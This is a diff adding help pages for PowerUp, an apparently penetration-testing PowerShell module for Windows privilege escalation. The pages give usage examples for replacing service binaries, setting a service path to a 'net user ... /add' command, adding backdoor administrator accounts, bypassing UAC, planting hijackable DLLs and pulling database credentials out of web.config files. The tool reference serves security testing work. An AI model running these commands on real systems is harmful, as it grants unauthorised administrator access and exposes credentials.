+Then checks if any binary paths have a space
+and aren't quoted.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-UnquotedService
+```
+
+Get a set of potentially exploitable services.
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.UnquotedService
+
+## NOTES
+
+## RELATED LINKS
+
+[https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb)
+
diff --git a/docs/Privesc/Get-WebConfig.md b/docs/Privesc/Get-WebConfig.md new file mode 100755 index 0000000..78cef7d --- /dev/null +++ b/docs/Privesc/Get-WebConfig.md @@ -0,0 +1,93 @@ +# Get-WebConfig
+
+## SYNOPSIS
+This script will recover cleartext and encrypted connection strings from all web.config
+files on the system.
+Also, it will decrypt them if needed.
+
+Author: Scott Sutherland, Antti Rantasaari
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-WebConfig
+```
+
+## DESCRIPTION
+This script will identify all of the web.config files on the system and recover the
+connection strings used to support authentication to backend databases.
+If needed, the
+script will also decrypt the connection strings on the fly.
+The output supports the
+pipeline which can be used to convert all of the results into a pretty table by piping
+to format-table.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Return a list of cleartext and decrypted connect strings from web.config files.
+```
+
+Get-WebConfig
+
+user : s1admin
+pass : s1password
+dbserv : 192.168.1.103\server1
+vdir : C:\test2
+path : C:\test2\web.config
+encr : No
+
+user : s1user
+pass : s1password
+dbserv : 192.168.1.103\server1
+vdir : C:\inetpub\wwwroot
+path : C:\inetpub\wwwroot\web.config
+encr : Yes
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Return a list of clear text and decrypted connect strings from web.config files.
+```
+
+Get-WebConfig | Format-Table -Autosize
+
+user pass dbserv vdir path encr
+---- ---- ------ ---- ---- ----
+s1admin s1password 192.168.1.101\server1 C:\App1 C:\App1\web.config No
+s1user s1password 192.168.1.101\server1 C:\inetpub\wwwroot C:\inetpub\wwwroot\web.config No
+s2user s2password 192.168.1.102\server2 C:\App2 C:\App2\test\web.config No
+s2user s2password 192.168.1.102\server2 C:\App2 C:\App2\web.config Yes
+s3user s3password 192.168.1.103\server3 D:\App3 D:\App3\web.config No
+
+## PARAMETERS
+
+## INPUTS
+
+## OUTPUTS
+
+### System.Boolean
+
+System.Data.DataTable
+
+## NOTES
+Below is an alterantive method for grabbing connection strings, but it doesn't support decryption.
+for /f "tokens=*" %i in ('%systemroot%\system32\inetsrv\appcmd.exe list sites /text:name') do %systemroot%\system32\inetsrv\appcmd.exe list config "%i" -section:connectionstrings
+
+Author: Scott Sutherland - 2014, NetSPI
+Author: Antti Rantasaari - 2014, NetSPI
+
+## RELATED LINKS
+
+[https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1
+http://www.netspi.com
+https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx
+http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe
+http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1
+http://www.netspi.com
+https://raw2.github.com/NetSPI/cmdsql/master/cmdsql.aspx
+http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe
+http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx)
+
diff --git a/docs/Privesc/Install-ServiceBinary.md b/docs/Privesc/Install-ServiceBinary.md new file mode 100755 index 0000000..bc75a2a --- /dev/null +++ b/docs/Privesc/Install-ServiceBinary.md @@ -0,0 +1,175 @@ +# Install-ServiceBinary
+
+## SYNOPSIS
+Replaces the service binary for the specified service with one that executes
+a specified command as SYSTEM.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary
+
+## SYNTAX
+
+```
+Install-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>]
+ [-Credential <PSCredential>] [-Command <String>]
+```
+
+## DESCRIPTION
+Takes a esrvice Name or a ServiceProcess.ServiceController on the pipeline where the
+current user can modify the associated service binary listed in the binPath.
+Backs up
+the original service binary to "OriginalService.exe.bak" in service binary location,
+and then uses Write-ServiceBinary to create a C# service binary that either adds
+a local administrator user or executes a custom command.
+The new service binary is
+replaced in the original service binary path, and a custom object is returned that
+captures the original and new service binary configuration.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Install-ServiceBinary -Name VulnSVC
+```
+
+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
+for VulnSVC with one that adds a local Administrator (john/Password123!).
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Service VulnSVC | Install-ServiceBinary
+```
+
+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
+for VulnSVC with one that adds a local Administrator (john/Password123!).
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Install-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'
+```
+
+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
+for VulnSVC with one that adds TESTLAB\john to the Administrators local group.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Install-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!
+```
+
+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
+for VulnSVC with one that adds a local Administrator (backdoor/Password123!).
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+Install-ServiceBinary -Name VulnSVC -Command "net ..."
+```
+
+Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary
+for VulnSVC with one that executes a custom command.
+
+## PARAMETERS
+
+### -Name
+The service name the EXE will be running under.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServiceName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -UserName
+The \[domain\\\]username to add.
+If not given, it defaults to "john".
+Domain users are not created, only added to the specified localgroup.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: John
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Password
+The password to set for the added user.
+If not given, it defaults to "Password123!"
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Password123!
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LocalGroup
+Local group name to add the user to (default of 'Administrators').
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object specifying the user/password to add.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Command
+Custom command to execute instead of user creation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.ServiceBinary.Installed
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Invoke-PrivescAudit.md b/docs/Privesc/Invoke-PrivescAudit.md new file mode 100755 index 0000000..7110962 --- /dev/null +++ b/docs/Privesc/Invoke-PrivescAudit.md @@ -0,0 +1,63 @@ +# Invoke-PrivescAudit
+
+## SYNOPSIS
+Executes all functions that check for various Windows privilege escalation opportunities.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Invoke-PrivescAudit [-HTMLReport]
+```
+
+## DESCRIPTION
+Executes all functions that check for various Windows privilege escalation opportunities.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-PrivescAudit
+```
+
+Runs all escalation checks and outputs a status report for discovered issues.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Invoke-PrivescAudit -HTMLReport
+```
+
+Runs all escalation checks and outputs a status report to SYSTEM.username.html
+detailing any discovered issues.
+
+## PARAMETERS
+
+### -HTMLReport
+Switch.
+Write a HTML version of the report to SYSTEM.username.html.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.String
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Invoke-ServiceAbuse.md b/docs/Privesc/Invoke-ServiceAbuse.md new file mode 100755 index 0000000..8d493d7 --- /dev/null +++ b/docs/Privesc/Invoke-ServiceAbuse.md @@ -0,0 +1,194 @@ +# Invoke-ServiceAbuse
+
+## SYNOPSIS
+Abuses a function the current user has configuration rights on in order
+to add a local administrator or execute a custom command.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath
+
+## SYNTAX
+
+```
+Invoke-ServiceAbuse [-Name] <String[]> [-UserName <String>] [-Password <String>] [-LocalGroup <String>]
+ [-Credential <PSCredential>] [-Command <String>] [-Force]
+```
+
+## DESCRIPTION
+Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current
+user has configuration modification rights on and executes a series of automated actions to
+execute commands as SYSTEM.
+First, the service is enabled if it was set as disabled and the
+original service binary path and configuration state are preserved.
+Then the service is stopped
+and the Set-ServiceBinaryPath function is used to set the binary (binPath) for the service to a
+series of commands, the service is started, stopped, and the next command is configured.
+After
+completion, the original service configuration is restored and a custom object is returned
+that captures the service abused and commands run.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-ServiceAbuse -Name VulnSVC
+```
+
+Abuses service 'VulnSVC' to add a localuser "john" with password
+"Password123!
+to the machine and local administrator group
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Service VulnSVC | Invoke-ServiceAbuse
+```
+
+Abuses service 'VulnSVC' to add a localuser "john" with password
+"Password123!
+to the machine and local administrator group
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Invoke-ServiceAbuse -Name VulnSVC -UserName "TESTLAB\john"
+```
+
+Abuses service 'VulnSVC' to add a the domain user TESTLAB\john to the
+local adminisrtators group.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Invoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup "Power Users"
+```
+
+Abuses service 'VulnSVC' to add a localuser "backdoor" with password
+"password" to the machine and local "Power Users" group
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+Invoke-ServiceAbuse -Name VulnSVC -Command "net ..."
+```
+
+Abuses service 'VulnSVC' to execute a custom command.
+
+## PARAMETERS
+
+### -Name
+An array of one or more service names to abuse.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: ServiceName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -UserName
+The \[domain\\\]username to add.
+If not given, it defaults to "john".
+Domain users are not created, only added to the specified localgroup.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: John
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Password
+The password to set for the added user.
+If not given, it defaults to "Password123!"
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Password123!
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LocalGroup
+Local group name to add the user to (default of 'Administrators').
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object specifying the user/password to add.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Command
+Custom command to execute instead of user creation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Force
+Switch.
+Force service stopping, even if other services are dependent.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.AbusedService
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Invoke-WScriptUACBypass.md b/docs/Privesc/Invoke-WScriptUACBypass.md new file mode 100755 index 0000000..f9eeb8d --- /dev/null +++ b/docs/Privesc/Invoke-WScriptUACBypass.md @@ -0,0 +1,85 @@ +# Invoke-WScriptUACBypass
+
+## SYNOPSIS
+Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe.
+
+Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Invoke-WScriptUACBypass [-Command] <String> [-WindowStyle <String>]
+```
+
+## DESCRIPTION
+Drops wscript.exe and a custom manifest into C:\Windows and then proceeds to execute
+VBScript using the wscript executable with the new manifest.
+The VBScript executed by
+C:\Windows\wscript.exe will run elevated.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+"
+```
+
+Launches the specified PowerShell encoded command in high-integrity.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Invoke-WScriptUACBypass -Command cmd.exe -WindowStyle 'Visible'
+```
+
+Spawns a high integrity cmd.exe.
+
+## PARAMETERS
+
+### -Command
+The shell command you want wscript.exe to run elevated.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: CMD
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -WindowStyle
+Whether to display or hide the window for the executed '-Command X'.
+Accepted values are 'Hidden' and 'Normal'/'Visible.
+Default is 'Hidden'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Hidden
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html
+https://github.com/Vozzie/uacscript
+https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1](http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html
+https://github.com/Vozzie/uacscript
+https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1)
+
diff --git a/docs/Privesc/Restore-ServiceBinary.md b/docs/Privesc/Restore-ServiceBinary.md new file mode 100755 index 0000000..a88fc29 --- /dev/null +++ b/docs/Privesc/Restore-ServiceBinary.md @@ -0,0 +1,87 @@ +# Restore-ServiceBinary
+
+## SYNOPSIS
+Restores a service binary backed up by Install-ServiceBinary.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-ServiceDetail, Get-ModifiablePath
+
+## SYNTAX
+
+```
+Restore-ServiceBinary [-Name] <String> [[-BackupPath] <String>]
+```
+
+## DESCRIPTION
+Takes a service Name or a ServiceProcess.ServiceController on the pipeline and
+checks for the existence of an "OriginalServiceBinary.exe.bak" in the service
+binary location.
+If it exists, the backup binary is restored to the original
+binary path.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Restore-ServiceBinary -Name VulnSVC
+```
+
+Restore the original binary for the service 'VulnSVC'.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Service VulnSVC | Restore-ServiceBinary
+```
+
+Restore the original binary for the service 'VulnSVC'.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe'
+```
+
+Restore the original binary for the service 'VulnSVC' from a custom location.
+
+## PARAMETERS
+
+### -Name
+The service name to restore a binary for.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServiceName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -BackupPath
+Optional manual path to the backup binary.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.ServiceBinary.Installed
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Set-ServiceBinaryPath.md b/docs/Privesc/Set-ServiceBinaryPath.md new file mode 100755 index 0000000..b39926f --- /dev/null +++ b/docs/Privesc/Set-ServiceBinaryPath.md @@ -0,0 +1,92 @@ +# Set-ServiceBinaryPath
+
+## SYNOPSIS
+Sets the binary path for a service to a specified value.
+
+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+```
+Set-ServiceBinaryPath [-Name] <String[]> [-Path] <String>
+```
+
+## DESCRIPTION
+Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a
+service handle to the service with ConfigControl access using the GetServiceHandle
+Win32 API call.
+ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath)
+to the string value specified by binPath, and the handle is closed off.
+
+Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a
+Dacl field to each object.
+It does this by opening a handle with ReadControl for the
+service with using the GetServiceHandle Win32 API call and then uses
+QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Set-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add'
+```
+
+Sets the binary path for 'VulnSvc' to be a command to add a user.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add'
+```
+
+Sets the binary path for 'VulnSvc' to be a command to add a user.
+
+## PARAMETERS
+
+### -Name
+An array of one or more service names to set the binary path for.
+Required.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: ServiceName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Path
+The new binary path (lpBinaryPathName) to set for the specified service.
+Required.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: BinaryPath, binPath
+
+Required: True
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.Boolean
+
+$True if configuration succeeds, $False otherwise.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx)
+
diff --git a/docs/Privesc/Test-ServiceDaclPermission.md b/docs/Privesc/Test-ServiceDaclPermission.md new file mode 100755 index 0000000..2251a11 --- /dev/null +++ b/docs/Privesc/Test-ServiceDaclPermission.md @@ -0,0 +1,112 @@ +# Test-ServiceDaclPermission
+
+## SYNOPSIS
+Tests one or more passed services or service names against a given permission set,
+returning the service objects where the current user have the specified permissions.
+
+Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: Add-ServiceDacl
+
+## SYNTAX
+
+```
+Test-ServiceDaclPermission [-Name] <String[]> [-Permissions <String[]>] [-PermissionSet <String>]
+```
+
+## DESCRIPTION
+Takes a service Name or a ServiceProcess.ServiceController on the pipeline, and first adds
+a service Dacl to the service object with Add-ServiceDacl.
+All group SIDs for the current
+user are enumerated services where the user has some type of permission are filtered.
+The
+services are then filtered against a specified set of permissions, and services where the
+current user have the specified permissions are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-Service | Test-ServiceDaclPermission
+```
+
+Return all service objects where the current user can modify the service configuration.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Service | Test-ServiceDaclPermission -PermissionSet 'Restart'
+```
+
+Return all service objects that the current user can restart.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Test-ServiceDaclPermission -Permissions 'Start' -Name 'VulnSVC'
+```
+
+Return the VulnSVC object if the current user has start permissions.
+
+## PARAMETERS
+
+### -Name
+An array of one or more service names to test against the specified permission set.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: ServiceName, Service
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Permissions
+A manual set of permission to test again.
+One of:'QueryConfig', 'ChangeConfig', 'QueryStatus',
+'EnumerateDependents', 'Start', 'Stop', 'PauseContinue', 'Interrogate', UserDefinedControl',
+'Delete', 'ReadControl', 'WriteDac', 'WriteOwner', 'Synchronize', 'AccessSystemSecurity',
+'GenericAll', 'GenericExecute', 'GenericWrite', 'GenericRead', 'AllAccess'
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PermissionSet
+A pre-defined permission set to test a specified service against.
+'ChangeConfig', 'Restart', or 'AllAccess'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: ChangeConfig
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### ServiceProcess.ServiceController
+
+## NOTES
+
+## RELATED LINKS
+
+[https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/)
+
diff --git a/docs/Privesc/Write-HijackDll.md b/docs/Privesc/Write-HijackDll.md new file mode 100755 index 0000000..d38e3e7 --- /dev/null +++ b/docs/Privesc/Write-HijackDll.md @@ -0,0 +1,173 @@ +# Write-HijackDll
+
+## SYNOPSIS
+Patches in the path to a specified .bat (containing the specified command) into a
+pre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Write-HijackDll [-DllPath] <String> [[-Architecture] <String>] [[-BatPath] <String>] [[-UserName] <String>]
+ [[-Password] <String>] [[-LocalGroup] <String>] [[-Credential] <PSCredential>] [[-Command] <String>]
+```
+
+## DESCRIPTION
+First builds a self-deleting .bat file that executes the specified -Command or local user,
+to add and writes the.bat out to -BatPath.
+The BatPath is then patched into a pre-compiled
+C++ DLL that is built to be hijackable by the IKEEXT service.
+There are two DLLs, one for
+x86 and one for x64, and both are contained as base64-encoded strings.
+The DLL is then
+written out to the specified OutputFile.
+
+## EXAMPLES
+
+### Example 1
+```
+PS C:\> {{ Add example code here }}
+```
+
+{{ Add example description here }}
+
+## PARAMETERS
+
+### -DllPath
+File name to write the generated DLL out to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Architecture
+The Architecture to generate for the DLL, x86 or x64.
+If not specified, PowerUp
+will try to automatically determine the correct architecture.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -BatPath
+Path to the .bat for the DLL to launch.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserName
+The \[domain\\\]username to add.
+If not given, it defaults to "john".
+Domain users are not created, only added to the specified localgroup.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: John
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Password
+The password to set for the added user.
+If not given, it defaults to "Password123!"
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: Password123!
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LocalGroup
+Local group name to add the user to (default of 'Administrators').
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: Administrators
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object specifying the user/password to add.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 7
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Command
+Custom command to execute instead of user creation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 8
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerUp.HijackableDLL
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Privesc/Write-ServiceBinary.md b/docs/Privesc/Write-ServiceBinary.md new file mode 100755 index 0000000..7d588a5 --- /dev/null +++ b/docs/Privesc/Write-ServiceBinary.md @@ -0,0 +1,191 @@ +# Write-ServiceBinary
+
+## SYNOPSIS
+Patches in the specified command to a pre-compiled C# service executable and
+writes the binary out to the specified ServicePath location.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>]
+ [-Credential <PSCredential>] [-Command <String>] [-Path <String>]
+```
+
+## DESCRIPTION
+Takes a pre-compiled C# service binary and patches in the appropriate commands needed
+for service abuse.
+If a -UserName/-Password or -Credential is specified, the command
+patched in creates a local user and adds them to the specified -LocalGroup, otherwise
+the specified -Command is patched in.
+The binary is then written out to the specified
+-ServicePath.
+Either -Name must be specified for the service, or a proper object from
+Get-Service must be passed on the pipeline in order to patch in the appropriate service
+name the binary will be running under.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Write-ServiceBinary -Name VulnSVC
+```
+
+Writes a service binary to service.exe in the local directory for VulnSVC that
+adds a local Administrator (john/Password123!).
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-Service VulnSVC | Write-ServiceBinary
+```
+
+Writes a service binary to service.exe in the local directory for VulnSVC that
+adds a local Administrator (john/Password123!).
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Write-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'
+```
+
+Writes a service binary to service.exe in the local directory for VulnSVC that adds
+TESTLAB\john to the Administrators local group.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Write-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!
+```
+
+Writes a service binary to service.exe in the local directory for VulnSVC that
+adds a local Administrator (backdoor/Password123!).
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+Write-ServiceBinary -Name VulnSVC -Command "net ..."
+```
+
+Writes a service binary to service.exe in the local directory for VulnSVC that
+executes a custom command.
+
+## PARAMETERS
+
+### -Name
+The service name the EXE will be running under.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServiceName
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -UserName
+The \[domain\\\]username to add.
+If not given, it defaults to "john".
+Domain users are not created, only added to the specified localgroup.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: John
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Password
+The password to set for the added user.
+If not given, it defaults to "Password123!"
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Password123!
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LocalGroup
+Local group name to add the user to (default of 'Administrators').
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object specifying the user/password to add.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Command
+Custom command to execute instead of user creation.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Path
+Path to write the binary out to, defaults to 'service.exe' in the local directory.
+
+```yaml
+Type: String
